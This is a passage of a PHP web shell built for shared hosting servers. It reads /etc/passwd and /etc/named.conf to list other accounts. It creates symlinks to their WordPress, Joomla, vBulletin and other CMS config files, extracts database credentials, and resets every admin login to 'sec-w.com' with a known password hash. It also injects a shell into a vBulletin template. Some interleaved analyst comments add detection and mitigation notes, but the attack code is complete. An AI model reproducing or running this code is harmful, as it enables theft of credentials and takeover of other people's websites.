  736. </tr></div> ";
  737.  
  738.  
  739. flush();
  740. flush();
  741.  
  742.  
  743. }
  744.  
  745.  
  746.  
  747.  
  748.  
  749.  
  750. die ("</tr></div>");
  751.  
  752.  
  753. }
  754.  
  755.  
  756.  
  757.  
  758.  
  759. }
  760.  
  761.  
  762.  
  763. echo "read /etc/passwd";
  764. echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
  765. flush();
  766.  
  767. $file = '/etc/passwd';
  768.  
  769.  
  770. $r3ad = @fopen($file, 'r');
  771. if ($r3ad){
  772. $content = @fread($r3ad, @filesize($file));
  773. echo "".htmlentities($content)."";
  774. }
  775. elseif(!$r3ad)
  776. {
  777. $r3ad = @show_source($file) ;
  778. }
  779. elseif(!$r3ad)
  780. {
  781. $r3ad = @highlight_file($file);
  782. }
  783. elseif(!$r3ad)
  784. {
  785.  
  786. for($uid=0;$uid<1000;$uid++){
  787. $ara = posix_getpwuid($uid);
  788. if (!empty($ara)) {
  789. while (list ($key, $val) = each($ara)){
  790. print "$val:";
  791. }
  792. print "\n";
  793. }
  794.  
  795. }
  796.  
  797. }
  798.  
  799.  
  800. flush();
  801.  
  802.  
  803. echo "</textarea><br /><br /><input type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
  804. flush();
  805.  
  806. break;
  807.  
  808. case 'joomla':
  809.  
  810. /////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////
  811.  
  812.  
  813. if(isset($_POST['s'])){
  814.  
  815. $file = @file_get_contents('joomla.txt');
  816.  
  817. $ex = explode("\n",$file);
  818.  
  819. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  820. flush();
  821.  
  822.  
  823. foreach ($ex as $exp){
  824.  
  825. $es = explode("||",$exp);
  826.  
  827. $config = $es[0];
  828.  
  829. $domin = $es[1];
  830.  
  831. $domins = trim($domin).'';
  832.  
  833. $readconfig = @file_get_contents(trim($config));
  834.  
  835. if(ereg('JConfig',$readconfig)){
  836.  
  837.  
  838.  
  839. $pass = ex($readconfig,'$password = \'',"';");
  840.  
  841. $userdb = ex($readconfig,'$user = \'',"';");
  842.  
  843. $db = ex($readconfig,'$db = \'',"';");
  844.  
  845. $fix = ex($readconfig,'$dbprefix = \'',"';");
  846.  
  847. $tab = $fix.'users';
  848.  
  849.  
  850. $con = @mysql_connect('localhost',$userdb,$pass);
  851.  
  852. $db = @mysql_select_db($db,$con);
  853.  
  854. $query = @mysql_query("UPDATE `$tab` SET `username` ='sec-w.com'");
  855.  
  856.  
  857. $query3 = @mysql_query("UPDATE `$tab` SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
  858.  
  859.  
  860. if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:blue">failed</b>';}
  861.  
  862. $domins = trim($domin).'';
  863.  
  864. echo "<tr>
  865. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  866. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  867. flush();
  868.  
  869.  
  870.  
  871. }else{
  872.  
  873. echo "<tr>
  874. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  875. <td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:blue'>failed</tr>";
  876. flush();
  877.  
  878. }
  879.  
  880. }
  881.  
  882.  
  883.  
  884.  
  885.  
  886.  
  887.  
  888.  
  889.  
  890. die();
  891.  
  892. }
  893.  
  894. if(!is_file('named.txt')){
  895.  
  896. $d00m = @file("/etc/named.conf");
  897.  
  898. flush();
  899.  
  900.  
  901. }else{
  902.  
  903. $d00m = file("named.txt");
  904.  
  905.  
  906. }
  907. if(!$d00m)
  908. {
  909.  
  910. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  911. }
  912. else
  913.  
  914. {
  915. echo "<div class='tmp'>
  916. <form method='POST' action='$pg?sws=joomla'>
  917. <input type='submit' value='Mass ching Admin' />
  918. <input type='hidden' value='1' name='s' />
  919. </form><br /><br />
  920. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  921.  
  922. $f = fopen('joomla.txt','w');
  923.  
  924. foreach($d00m as $dom){
  925.  
  926. if(eregi("zone",$dom)){
  927.  
  928. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  929.  
  930. if(strlen(trim($domsws[1][0])) > 2){
  931.  
  932. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  933.  
  934. ///////////////////////////////////////////////////////////////////////////////////
  935.  
  936. $wpl=$pageURL."idb/te4m/home/".$user['name']."/public_html/configuration.php";
  937. $wpp=get_headers($wpl);
  938. $wp=$wpp[0];
  939.  
  940. $wp2=$pageURL."idb/te4m/home/".$user['name']."/public_html/blog/configuration.php";
  941. $wpp2=get_headers($wp2);
  942. $wp12=$wpp2[0];
  943.  
  944. $wp3=$pageURL."idb/te4m/home/".$user['name']."/public_html/joomla/configuration.php";
  945. $wpp3=get_headers($wp3);
  946. $wp13=$wpp3[0];
  947.  
  948.  
  949. ////////// joomla ////////////
  950.  
  951. $pos = strpos($wp, "200");
  952. $config="&nbsp;";
  953.  
  954. if (strpos($wp, "200") == true )
  955. {
  956. $config= $wpl;
  957. }
  958. elseif (strpos($wp12, "200") == true)
  959. {
  960. $config= $wp2;
  961. }
  962. elseif (strpos($wp13, "200") == true)
  963. {
  964. $config= $wp3;
  965. }
  966. else
  967. {
  968. continue;
  969.  
  970. }
  971. flush();
  972.  
  973. /////////////////////////////////////////////////////////////////////////////////////
  974.  
  975. $dom = $domsws[1][0];
  976.  
  977. $w = fwrite($f,"$config||$dom \n");
  978. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:blue">failed</b>';}
  979.  
  980.  
  981. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  982. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  983.  
  984.  
  985.  
  986.  
  987.  
  988. flush();
  989.  
  990.  
  991. }
  992. }
  993. }
  994. }
  995.  
  996.  
  997. break;
  998.  
  999. case 'wp':
  1000.  
  1001. ############################ index #########################3
  1002.  
  1003.  
  1004.  
  1005.  
  1006.  
  1007.  
  1008. ######## admin ##########33
  1009.  
  1010. if(isset($_POST['s'])){ // runs when the hidden field 's' of the "Mass Change Admin" form is posted
  1011. // Analyst note: wp.txt holds the "config||domain" lines written by the discovery loop later in this case.
  1012. $file = @file_get_contents('wp.txt');
  1013.  
  1014. $ex = explode("\n",$file);
  1015.  
  1016. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  1017. flush();
  1018. flush();
  1019.  
  1020. // One pass per recorded site: field 0 is the config location, field 1 the domain.
  1021. foreach ($ex as $exp){
  1022.  
  1023. $es = explode("||",$exp);
  1024.  
  1025. $config = $es[0];
  1026.  
  1027. $domin = $es[1];
  1028.  
  1029. $domins = trim($domin).'';
  1030. // The config is fetched as text; the branch below only runs when it contains 'wp-settings.php'.
  1031. $readconfig = @file_get_contents(trim($config));
  1032. // ereg() and the mysql_* calls below were removed in PHP 7.0, so this path only functions on PHP 5.x hosts.
  1033. if(ereg('wp-settings.php',$readconfig)){
  1034. // ex() is defined outside this excerpt; presumably it returns the text between the two markers - confirm.
  1035. // Database password, user, name and table prefix are taken from the other site's wp-config.php.
  1036.  
  1037. $pass = ex($readconfig,"define('DB_PASSWORD', '","');");
  1038.  
  1039. $userdb = ex($readconfig,"define('DB_USER', '","');");
  1040.  
  1041. $db = ex($readconfig,"define('DB_NAME', '","');");
  1042.  
  1043. $fix = ex($readconfig,'$table_prefix = \'',"';");
  1044.  
  1045. $tab = $fix.'users';
  1046. // Connects to MySQL on localhost with the recovered credentials.
  1047. $con = @mysql_connect('localhost',$userdb,$pass);
  1048.  
  1049. $db = @mysql_select_db($db,$con);
  1050. // Impact: neither UPDATE has a WHERE clause, so every row of <prefix>users gets the same login and password hash.
  1051. $query = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;
  1052. // Detection: all accounts sharing the login 'sec-w.com', or an identical user_pass starting with '$1$' on every row.
  1053. $query = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
  1054. // Mitigation: keep wp-config.php unreadable to other accounts (per-user PHP execution, open_basedir,
  1055. // restrictive file mode); after an incident restore the users table and rotate the database password.
  1056.  
  1057. if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}
  1058.  
  1059. else
  1060.  
  1061. {
  1062.  
  1063. $r = '<b style="color:blue">failed</b>';
  1064.  
  1065. }
  1066.  
  1067. $domins = trim($domin).'';
  1068.  
  1069. echo "<tr>
  1070. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1071. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  1072.  
  1073. flush();
  1074. flush();
  1075.  
  1076.  
  1077.  
  1078.  
  1079.  
  1080. // Config did not contain the marker (or could not be read): the row is reported as "failed2".
  1081. }else{
  1082.  
  1083. echo "<tr>
  1084. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1085. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:blue'>failed2</tr>";
  1086.  
  1087. flush();
  1088. flush();
  1089.  
  1090. }
  1091.  
  1092. }
  1093.  
  1094.  
  1095.  
  1096.  
  1097.  
  1098.  
  1099.  
  1100.  
  1101.  
  1102.  
  1103. die();
  1104.  
  1105. }
  1106.  
  1107. if(!is_file('named.txt')){ // zone source: a local named.txt if present, otherwise /etc/named.conf
  1108.  
  1109. $d00m = @file("/etc/named.conf");
  1110.  
  1111. }else{
  1112.  
  1113. $d00m = @file("named.txt");
  1114.  
  1115.  
  1116. }
  1117. if(!$d00m)
  1118. {
  1119. // Nothing readable: the browser is redirected to ?sws=read (handled outside this excerpt).
  1120. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  1121. }
  1122. else
  1123.  
  1124. {
  1125. echo "<div class='tmp'>
  1126. <form method='POST' action='$pg?sws=wp'>
  1127. <input type='submit' value='Mass Change Admin' />
  1128. <input type='hidden' value='1' name='s' />
  1129. </form>
  1130. <br /><br />
  1131. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1132.  
  1133. flush();
  1134. flush();
  1135. // Analyst note: wp.txt is (re)created in the script's working directory on every visit - a file-system indicator.
  1136. $f = fopen('wp.txt','w');
  1137.  
  1138. foreach($d00m as $dom){
  1139. // Only lines mentioning "zone" are parsed; the quoted zone name is treated as a hosted domain.
  1140. if(eregi("zone",$dom)){
  1141.  
  1142. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1143.  
  1144. if(strlen(trim($domsws[1][0])) > 2){
  1145. // The account name is taken from the owner of /etc/valiases/<domain>.
  1146. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1147.  
  1148. ///////////////////////////////////////////////////////////////////////////////////
  1149. // $pageURL is set outside this excerpt; "idb/te4m" is presumably a web-reachable path created earlier - confirm.
  1150. $wpl=$pageURL."idb/te4m/home/".$user['name']."/public_html/wp-config.php";
  1151. $wpp=get_headers($wpl);
  1152. $wp=$wpp[0];
  1153.  
  1154. $wp2=$pageURL."idb/te4m/home/".$user['name']."/public_html/blog/wp-config.php";
  1155. $wpp2=get_headers($wp2);
  1156. $wp12=$wpp2[0];
  1157.  
  1158. $wp3=$pageURL."idb/te4m/home/".$user['name']."/public_html/wp/wp-config";
  1159. $wpp3=get_headers($wp3);
  1160. $wp13=$wpp3[0];
  1161.  
  1162.  
  1163. ////////// wp ////////////
  1164. // The first status line containing "200" decides which candidate is recorded; otherwise the domain is skipped.
  1165. $pos = strpos($wp, "200");
  1166. $config="&nbsp;";
  1167.  
  1168. if (strpos($wp, "200") == true )
  1169. {
  1170. $config= $wpl;
  1171. }
  1172. elseif (strpos($wp12, "200") == true)
  1173. {
  1174. $config= $wp2;
  1175. }
  1176. elseif (strpos($wp13, "200") == true)
  1177. {
  1178. $config= $wp3;
  1179. }
  1180. else
  1181. {
  1182. continue;
  1183.  
  1184. }
  1185. flush();
  1186.  
  1187. /////////////////////////////////////////////////////////////////////////////////////
  1188.  
  1189. $dom = $domsws[1][0];
  1190. // One "config||domain" line per hit; this file is the input of the posted 's' branch above.
  1191. $w = fwrite($f,"$config||$dom \n");
  1192. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:blue">failed</b>';}
  1193.  
  1194.  
  1195. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1196. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  1197. flush();
  1198. flush();
  1199. // Detection: bursts of self-directed header requests for */wp-config.php paths from the web server itself.
  1200. // Mitigation: restrict read access to /etc/named.conf and /etc/valiases for web users where the platform allows,
  1201. // so one tenant cannot enumerate the others.
  1202.  
  1203.  
  1204. flush();
  1205.  
  1206.  
  1207. }
  1208. }
  1209. }
  1210. }
  1211.  
  1212.  
  1213. break;
  1214.  
  1215.  
  1216. case 'vb':
  1217.  
  1218.  
  1219. if(isset($_POST['s'])){ // runs when the hidden field 's' of the "Inject shell" form is posted
  1220. // Analyst note: vb.txt holds the "config||domain" lines written by the discovery loop later in this case.
  1221.  
  1222.  
  1223. $file = @file_get_contents('vb.txt');
  1224.  
  1225. $ex = explode("\n",$file);
  1226.  
  1227. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  1228.  
  1229.  
  1230. foreach ($ex as $exp){
  1231.  
  1232. $es = explode("||",$exp);
  1233.  
  1234. $config = $es[0];
  1235.  
  1236. $domin = $es[1];
  1237.  
  1238. $domins = trim($domin).'';
  1239. // The config is fetched as text; the branch below only runs when it contains 'vBulletin'.
  1240. $readconfig = @file_get_contents(trim($config));
  1241. // ereg() and the mysql_* calls below were removed in PHP 7.0, so this path only functions on PHP 5.x hosts.
  1242. if(ereg('vBulletin',$readconfig)){
  1243. // ex() is defined outside this excerpt; presumably it returns the text between the two markers - confirm.
  1244. // Database name, user and password are taken from the forum's includes/config.php.
  1245.  
  1246. $db = ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
  1247.  
  1248. $userdb = ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
  1249.  
  1250. $pass = ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
  1251.  
  1252. $con = @mysql_connect('localhost',$userdb,$pass);
  1253.  
  1254. $db = @mysql_select_db($db,$con);
  1255. // Impact: the row titled 'FAQ' in the `template` table is overwritten with $crypt, which is set outside
  1256. // this excerpt; the success message below refers to the result as a "shell in search.php".
  1257. $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
  1258.  
  1259. $query = @mysql_query($sqlfaq,$con);
  1260. // Detection: compare the FAQ template row with a known-good copy and review recent changes to `template`.
  1261. // Mitigation: keep includes/config.php unreadable to other accounts (per-user PHP execution, open_basedir,
  1262. // restrictive file mode) and rotate the database password after an incident.
  1263. if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
  1264.  
  1265. else
  1266.  
  1267. {
  1268.  
  1269. $r = '<b style="color:blue">failed</b>';
  1270.  
  1271. }
  1272.  
  1273. $domins = trim($domin).'';
  1274.  
  1275. echo "<tr>
  1276. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1277. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  1278.  
  1279.  
  1280.  
  1281.  
  1282.  
  1283.  
  1284. // Config did not contain the marker (or could not be read): the row is reported as "failed2".
  1285. }else{
  1286.  
  1287. echo "<tr>
  1288. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1289. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:blue'>failed2</tr>";
  1290. }
  1291.  
  1292. }
  1293.  
  1294.  
  1295.  
  1296.  
  1297.  
  1298.  
  1299.  
  1300.  
  1301.  
  1302.  
  1303. die();
  1304.  
  1305. }
  1306.  
  1307. if(!is_file('named.txt')){ // zone source: a local named.txt if present, otherwise /etc/named.conf
  1308.  
  1309. $d00m = file("/etc/named.conf");
  1310.  
  1311. }else{
  1312.  
  1313. $d00m = file("named.txt");
  1314.  
  1315.  
  1316. }
  1317. if(!$d00m)
  1318. {
  1319. // Nothing readable: the browser is redirected to ?sws=read (handled outside this excerpt).
  1320. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  1321. }
  1322. else
  1323.  
  1324. {
  1325. echo "<div class='tmp'>
  1326. <form method='POST' action='$pg?sws=vb'>
  1327. <input type='submit' value='Inject shell' />
  1328. <input type='hidden' value='1' name='s' />
  1329. </form>
  1330. <br /><br />
  1331. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1332. // Analyst note: vb.txt is (re)created in the script's working directory on every visit - a file-system indicator.
  1333. $f = fopen('vb.txt','w');
  1334.  
  1335. foreach($d00m as $dom){
  1336. // Only lines mentioning "zone" are parsed; the quoted zone name is treated as a hosted domain.
  1337. if(eregi("zone",$dom)){
  1338.  
  1339. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1340.  
  1341. if(strlen(trim($domsws[1][0])) > 2){
  1342. // The account name is taken from the owner of /etc/valiases/<domain>.
  1343. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1344.  
  1345. ///////////////////////////////////////////////////////////////////////////////////
  1346. // $pageURL is set outside this excerpt; "idb/te4m" is presumably a web-reachable path created earlier - confirm.
  1347. $wpl=$pageURL."idb/te4m/home/".$user['name']."/includes/config.php";
  1348. $wpp=get_headers($wpl);
  1349. $wp=$wpp[0];
  1350.  
  1351. $wp2=$pageURL."idb/te4m/home/".$user['name']."/vb/includes/config.php";
  1352. $wpp2=get_headers($wp2);
  1353. $wp12=$wpp2[0];
  1354.  
  1355. $wp3=$pageURL."idb/te4m/home/".$user['name']."/forum/includes/config.php";
  1356. $wpp3=get_headers($wp3);
  1357. $wp13=$wpp3[0];
  1358.  
  1359.  
  1360. ////////// vb ////////////
  1361. // The first status line containing "200" decides which candidate is recorded; otherwise the domain is skipped.
  1362. $pos = strpos($wp, "200");
  1363. $config="&nbsp;";
  1364.  
  1365. if (strpos($wp, "200") == true )
  1366. {
  1367. $config= $wpl;
  1368. }
  1369. elseif (strpos($wp12, "200") == true)
  1370. {
  1371. $config= $wp2;
  1372. }
  1373. elseif (strpos($wp13, "200") == true)
  1374. {
  1375. $config= $wp3;
  1376. }
  1377. else
  1378. {
  1379. continue;
  1380.  
  1381. }
  1382. flush();
  1383.  
  1384. /////////////////////////////////////////////////////////////////////////////////////
  1385.  
  1386. $dom = $domsws[1][0];
  1387. // One "config||domain" line per hit; this file is the input of the posted 's' branch above.
  1388. $w = fwrite($f,"$config||$dom \n");
  1389. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:blue">failed</b>';}
  1390.  
  1391.  
  1392. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1393. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  1394. // Detection: bursts of self-directed header requests for */includes/config.php paths from the web server itself.
  1395. // Mitigation: restrict read access to /etc/named.conf and /etc/valiases for web users where the platform allows.
  1396.  
  1397.  
  1398.  
  1399. flush();
  1400.  
  1401.  
  1402. }
  1403. }
  1404. }
  1405. }
  1406.  
  1407.  
  1408.  
  1409.  
  1410.  
  1411.  
  1412.  
  1413.  
  1414. break;
  1415.  
  1416. ############################ index #########################3
  1417.  
  1418.  
  1419. case 'help':
  1420.  
  1421. echo "<div class='tmp'>
  1422. <table align='center' width='40%'><td>function</td><td>Case</td>";
  1423. // Analyst note: this case only fingerprints the host - it reports which PHP settings and functions
  1424. // the other routines of this script depend on. "True" in the table means usable from the script's viewpoint.
  1425. $safe_mode = ini_get('safe_mode');
  1426. if($safe_mode){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1427. // Reported as "True" when safe_mode is off.
  1428. echo "<tr><td>Safe Mode</td><td>$r</td>";
  1429. // symlink() availability; the config-harvest routine elsewhere in this script aborts when it is disabled.
  1430. $fun = function_exists('symlink');
  1431. if(!$fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1432.  
  1433. echo "<tr><td>function symlink</td><td>$r</td>";
  1434.  
  1435.  
  1436. $fun = function_exists('file');
  1437. if(!$fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1438.  
  1439. echo "<tr><td>function file</td><td>$r</td>";
  1440.  
  1441. $fun = function_exists('file_get_contents');
  1442. if(!$fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1443.  
  1444. echo "<tr><td>function file_get_contents</td><td>$r</td>";
  1445.  
  1446. $fun = function_exists('mkdir');
  1447. if(!$fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1448.  
  1449. echo "<tr><td>function mkdir</td><td>$r</td>";
  1450.  
  1451. // 'empek/amis.txt' is a path used elsewhere in the script (not visible here); is_dir() on it feeds this row.
  1452. $fun = is_dir('empek/amis.txt');
  1453. if(!$fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1454.  
  1455. echo "<tr><td>Permission denied</td><td>$r</td>";
  1456.  
  1457. // The subject passed to preg_match() here is the boolean result of "X or !X", not the file content.
  1458. $fun = preg_match('/Forbidden/',@file_get_contents('empek/amis.txt') or !@file_get_contents('empek/amis.txt'));
  1459. if($fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
  1460.  
  1461. echo "<tr><td>Forbidden</td><td>$r</td>";
  1462.  
  1463. // Mitigation: listing symlink in disable_functions for web PHP removes the primitive this probe is looking for.
  1464.  
  1465.  
  1466. echo "</table></div>";
  1467.  
  1468.  
  1469.  
  1470. break;
  1471. default:
  1472. header("Location: $pg");
  1473.  
  1474.  
  1475.  
  1476.  
  1477. }
  1478.  
  1479.  
  1480. /// home ///
  1481. }else
  1482. {
  1483.  
  1484.  
  1485.  
  1486. ?>
  1487. <?php
  1488. if (isset($_GET['idb']) && ($_GET['idb'] == 'config')) { // Analyst note: cross-account config harvesting via symlinks
  1489. ?>
  1490. <form action="?&amp;idb=config" method="post">
  1491. <?php @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1); // the next statement prints the account names from /etc/passwd into the 'passwd' textarea
  1492. echo '
  1493. <form method="POST"><textarea cols="85" name="passwd" rows="20">'; $uSr=file("/etc/passwd"); foreach($uSr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
  1494. </textarea><br>Your Folder Config Name : <input type="text" class="input" name="folfig" size=40 />
  1495. <select class="inp" title="Select Your Type File" name="type" size=""><option title="type txt" value=".txt">.txt<option><option title="type php" value=".php">.php<option><option title="type shtml" value=".shtml">.shtml<option><option title="type ini" value=".ini">.ini<option></select>
  1496. <input name="conf" size="80" class="ipt" value="Hajar..." type="submit"><br><br></form></center>
  1497. <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
  1498. if ($_POST['conf']) { // form submitted: 'folfig' is the output directory, 'type' the suffix appended to every link name
  1499. $folfig = $_POST['folfig']; $type = $_POST['type'];
  1500. $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<blink>Maaf bro fitur Symlink masih di disabled :( </blink>');} // stops here when symlink is listed in disable_functions
  1501. @mkdir($folfig, 0755);
  1502. @chdir($folfig);
  1503. $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex idb.phtml\nAddType txt .php\nAddHandler txt .php"; // enables listing and symlink following; the AddType/AddHandler lines presumably make linked .php files come back as text - confirm
  1504. file_put_contents(".htaccess",$htaccess,FILE_APPEND); // Mitigation: SymLinksIfOwnerMatch and an AllowOverride that does not permit Options in .htaccess defeat this file
  1505. $passwd=explode("\n",$_POST["passwd"]); echo "<blink><center >tunggu sebentar ya ...</center></blink>";
  1506. foreach($passwd as $pwd){ $user=trim($pwd); // one pass per submitted account name; every link targets a well-known CMS config path under /home/<user>/public_html
  1507. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'~~>wordpress'.$type.''); // Detection: a directory full of links named "<user>~~>..." next to the .htaccess written above
  1508. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'~~>wordpress-wp'.$type.'');
  1509. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'~~>wordpress-wp-beta'.$type.'');
  1510. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'~~>wordpress-beta'.$type.'');
  1511. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'~~>wp13-press'.$type.'');
  1512. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'~~>wordpress-wordpress'.$type.'');
  1513. @symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$user.'~~>wordpress-wordpress-beta'.$type.'');
  1514. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'~~>wordpress-news'.$type.'');
  1515. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'~~>wordpress-new'.$type.'');
  1516. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'~~>wordpress'.$type.'');
  1517. @symlink('/home/'.$user.'/public_html/web/wp-config.php',$user.'~~>wordpress-web'.$type.'');
  1518. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'~~>wordpress-blogs'.$type.'');
  1519. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'~~>wordpress-home'.$type.'');
  1520. @symlink('/home/'.$user.'/public_html/protal/wp-config.php',$user.'~~>wordpress-protal'.$type.'');
  1521. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'~~>ordpress-site'.$type.'');
  1522. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'~~>wordpress-main'.$type.'');
  1523. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'~~>wordpress-test'.$type.'');
  1524. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'~~>joomla'.$type.'');
  1525. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'~~>joomla'.$type.'');
  1526. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
  1527. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'~~>joomla-joomla'.$type.'');
  1528. @symlink('/home/'.$user.'/public_html/protal/configuration.php',$user.'~~>joomla-protal'.$type.'');
  1529. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'~~>joomla-joo'.$type.'');
  1530. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'~~>joomla-cms'.$type.'');
  1531. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'~~>joomla-site'.$type.'');
  1532. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'~~>joomla-main'.$type.'');
  1533. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'~~>joomla-news'.$type.'');
  1534. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'~~>joomla-new'.$type.'');
  1535. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
  1536. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'~~>Vbulletin-forum'.$type.'');
  1537. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'~~>vbluttin'.$type.'');
  1538. @symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$user.'~~>vbluttin3'.$type.'');
  1539. @symlink('/home/'.$user.'/public_html/forum/includes/class_core.php',$user.'~~>vbluttin-class_core.php'.$type.'');
  1540. @symlink('/home/'.$user.'/public_html/vb/includes/class_core.php',$user.'~~>vbluttin-class_core.php1'.$type.'');
  1541. @symlink('/home/'.$user.'/public_html/cc/includes/class_core.php',$user.'~~>vbluttin-class_core.php2'.$type.'');
  1542. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'~~>vb1-config'.$type.'');
  1543. @symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$user.'~~>cpanel'.$type.'');
  1544. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'~~>panel'.$type.'');
  1545. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'~~>host'.$type.'');
  1546. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'~~>hosting'.$type.'');
  1547. @symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.'~~>hosts'.$type.'');
  1548. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'~~>zencart'.$type.'');
  1549. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'~~>zencart-shop'.$type.'');
  1550. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'~~>hop-ZCshop'.$type.'');
  1551. @symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'~~>mk-portale1'.$type.'');
  1552. @symlink('/home/'.$user.'/public_html/Settings.php',$user.'~~>smf'.$type.'');
  1553. @symlink('/home/'.$user.'/public_html/smf/Settings.php',$user.'~~>smf-smf'.$type.'');
  1554. @symlink('/home/'.$user.'/public_html/forum/Settings.php',$user.'~~>smf-forum'.$type.'');
